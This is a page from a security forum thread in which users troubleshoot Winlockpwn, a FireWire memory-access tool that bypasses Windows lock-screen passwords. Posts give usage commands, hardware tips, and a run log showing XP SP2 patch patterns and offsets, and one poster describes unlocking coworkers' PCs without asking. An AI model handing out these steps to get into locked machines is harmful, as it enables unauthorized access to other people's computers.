Page 4 of 5 FirstFirst ... 2345 LastLast
Results 31 to 40 of 46

Thread: Tutorial Winlockpwn

  1. #31
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    2

    Default

    Was doing some testing against filevault and finally realized I had access to another rom type. So here's attached a csr file snarfed from a powerbook g4 in case anyone can find a use for it. Unfortunately, it acts just like the ipod.csr when used to spoof the remote end of a firewire connection to Vista - at least for me. -tm

  2. #32

    Default

    I am having issues with it - any time I run ./businfo, nodecount=0, and anytime I run winlockpwn, it dies on the line where it tries to determine on which node it is.... the array just breaks... line 120.

  3. #33
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    So you run ./businfo. What does the ipod.csr come up as? It should be the only device, therefore port 0. Are you entering nodecount=0? You shouldnt have to.

  4. #34
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    7

    Default

    Quote Originally Posted by williamc View Post
    Updated Winlockpwn to support Vista and XP SP3.
    Any chance you'd be willing to search for offset values for regular and FUS unlocking in SP3? I'm gonna give it a shot this weekend, but I have never really analyzed or parsed memory addresses. I'll try to use the example provided at the moonloop site.

  5. #35
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Hello Guys,

    Would this work if I have a USB-to-Firewire cable? I am planning to plug he USB in BackTrack and the Firewire in the Windows machine.

    Thanks in advance,

  6. #36
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    Hi,all
    did you successfully unlock vista using your code?


    I'm researching this, but if anyone can shed some light on it, please do. I've purchased a cardbus firewire card for use on PC's that dont have Firewire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and your in! Guys in my office have disabled Firewire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

    An important note, if your running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts which may cause some "issues" if your in a corporate environment. the 2 option only unlocks the PC, should be enough for whatever mischief your planning (and have permission to do so).

    William[/QUOTE]

  7. #37
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    willamc,
    I've tested winlockpwn on windows xp sp2 with latest update. It failed to unlock windows xp sp2. But if I use a windows xp sp2 box without latest, winlockpwn works well. I used msv1.0 technique.

  8. #38
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default

    As I know, not USB-to-Firewire device. Currently I successfully unlocked winxp using PCMCIA-1394 and express card -1394.

    Quote Originally Posted by l1nuxant_ee View Post
    Hello Guys,

    Would this work if I have a USB-to-Firewire cable? I am planning to plug he USB in BackTrack and the Firewire in the Windows machine.

    Thanks in advance,

  9. #39
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    10

    Default

    Hi,

    I'm getting the following error when trying to run winlockpwn...

    Code:
    bt winlockpwn # ./winlockpwn 0 0 2
    Winlockpwn v1.5 Metlstorm, 2k6. <metlstorm@storm.net.nz>
    Target Selection:
     Name   : WinXP SP2 Unlock
     Notes  : When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.
     Pattern: 0x0502000010
     Offset : [3696]
     Patch  : 0xb801000000
     Offset : 0
    Scanning Options:
     Start  : 0x8000000
     Stop   : 0xffffffff
     Pagesz : 4096
    Init firwire, port 0 node 0
    Snarfin' memories...
    Checking for signature on page at 0x08000000 (131072kB) at 0 kB/s...
    Traceback (most recent call last):
      File "./winlockpwn", line 163, in <module>
        mem = n.read(offset + so , len(pattern))
      File "/root/pythonraw1394/firewire.py", line 715, in read
        data +=str(raw1394.raw1394_py_read(self.port.h.h, self.getNodeID(), long(addrhi), long(addrlo), maxb))
    IOError: [Errno 22] Invalid argument
    My businfo is hwoing:

    Code:
    bt winlockpwn # ./businfo
    Firewire initialized, with 1 ports available:
    Enumerating port & node tree...
    Port(number=0, generation=17, busid=1023, localid=0, nodeCount=2, name='ohci1394')
    Node(number=0, nodeid=0xffc0)
    ConfigROM(
     Length                               : 16 bytes
     CRC Length                           : 16 bytes
     CRC                                  : 0x7286 (Valid)
     Bus ID                               : "1394"
     GUID                                 : 0x000a270002aa6ba7
     Vendor                               : 0x00000a27 (Apple Computer, Inc.)
     Link Speed                           : 2 (S400)
     Max Record Size                      : 10 (2048 bytes)
     Isochronous Capable                  : 0 (No)
     Bus Master Capable                   : 0 (No)
     Cycle Master Capable                 : 0 (No)
     Cycle Master Clock Accuracy          : 0 ppm
     Isochronous Resource Manager Capable : 0 (No)
     Root Directory: 16 bytes, crc: 0xf93c (Valid)
      0 (Immediate Value), 12 (Node Capabilities): 0x83c0
      0 (Immediate Value), 3 (Module Vendor ID): 0xa27 (Apple Computer, Inc.)
      2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 68 bytes
       TextLeaf: 32 bytes, crc: 0x96bc (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
       text: "Apple Computer, Inc."
      3 (Offset to Directory), 17 (Unit Directory): Offset: 4 bytes
        Unit Directory: 56 bytes, crc: 0xe5a0 (Valid)
        0 (Immediate Value), 18 (Unit Spec ID): 0x609e (ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS)
        0 (Immediate Value), 19 (Unit SW Version): 0x10483
        0 (Immediate Value), 33 (Unknown 33): 0x1
        0 (Immediate Value), 58 (Unknown 58): 0xa08
        0 (Immediate Value), 62 (Unknown 62): 0x4c10
        0 (Immediate Value), 56 (Unknown 56): 0x609e
        0 (Immediate Value), 57 (Unknown 57): 0x104d8
        0 (Immediate Value), 59 (Unknown 59): 0x0
        0 (Immediate Value), 60 (Unknown 60): 0xa2700
        1 (Offset to Immediate Value), 20 (Unit Dependant Info): Offset: 65536 bytes Offset Data: **Offset to immediate beyond end of CSR space**
        0 (Immediate Value), 61 (Unknown 61): 0x3
        0 (Immediate Value), 20 (Unit Dependant Info): 0xe0000
        0 (Immediate Value), 23 (Model ID): 0x21
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
         TextLeaf: 16 bytes, crc: 0x34e7 (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
         text: "iPod"
    )
    Node(number=1, nodeid=0xffc1)
    ConfigROM(
     Length                               : 16 bytes
     CRC Length                           : 16 bytes
     CRC                                  : 0x7a41 (Invalid (0x2a72))
     Bus ID                               : "1394"
     GUID                                 : 0x00110666000007e6
     Vendor                               : 0x00001106 (Siemens NV (Belgium))
     Link Speed                           : 2 (S400)
     Max Record Size                      : 10 (2048 bytes)
     Isochronous Capable                  : 1 (Yes)
     Bus Master Capable                   : 1 (Yes)
     Cycle Master Capable                 : 1 (Yes)
     Cycle Master Clock Accuracy          : 0 ppm
     Isochronous Resource Manager Capable : 1 (Yes)
     Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
      0 (Immediate Value), 12 (Node Capabilities): 0x83c0
      0 (Immediate Value), 28 (Unknown 28): 0x50f2
      0 (Immediate Value), 29 (Unknown 29): 0x2
      0 (Immediate Value), 30 (Unknown 30): 0x0
      0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)
      2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 32 bytes
       TextLeaf: 32 bytes, crc: 0x7c05 (Invalid (0x1183)), language spec: 0x80000000 (), language id: 0x00000409,
       text: "Microsoft"
      3 (Offset to Directory), 17 (Unit Directory): Offset: 8 bytes
        Unit Directory: 16 bytes, crc: 0xade9 (Invalid (0x12e4))
        0 (Immediate Value), 18 (Unit Spec ID): 0x50f2 (MICROSOFT CORP.)
        0 (Immediate Value), 19 (Unit SW Version): 0x0
        0 (Immediate Value), 23 (Model ID): 0x0
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
         TextLeaf: 48 bytes, crc: 0xfc7d (Invalid (0xd16f)), language spec: 0x80000000 (), language id: 0x00000409,
         text: "1394 PC"
      3 (Offset to Directory), 17 (Unit Directory): Offset: 112 bytes
        Unit Directory: 16 bytes, crc: 0xadeb (Invalid (0x5178))
        0 (Immediate Value), 18 (Unit Spec ID): 0x5e (USC INFORMATION SCIENCES INST)
        0 (Immediate Value), 19 (Unit SW Version): 0x1
        0 (Immediate Value), 23 (Model ID): 0x7bb0cf
        2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 4 bytes
         TextLeaf: 24 bytes, crc: 0x3891 (Invalid (0xb6f2)), language spec: 0x80000000 (), language id: 0x00000409,
         text: "NIC1394"
    )
    I've been trying to get this working for a few days now, could anyone point out what I'm doing wrong? I've tried using ./winlockpwn 0 0 2 and ./winlockpwn 0 1 2...

    Cheers

  10. #40
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    10

    Default

    Apparently i need to rename or move the sbp2.ko module...

Page 4 of 5 FirstFirst ... 2345 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •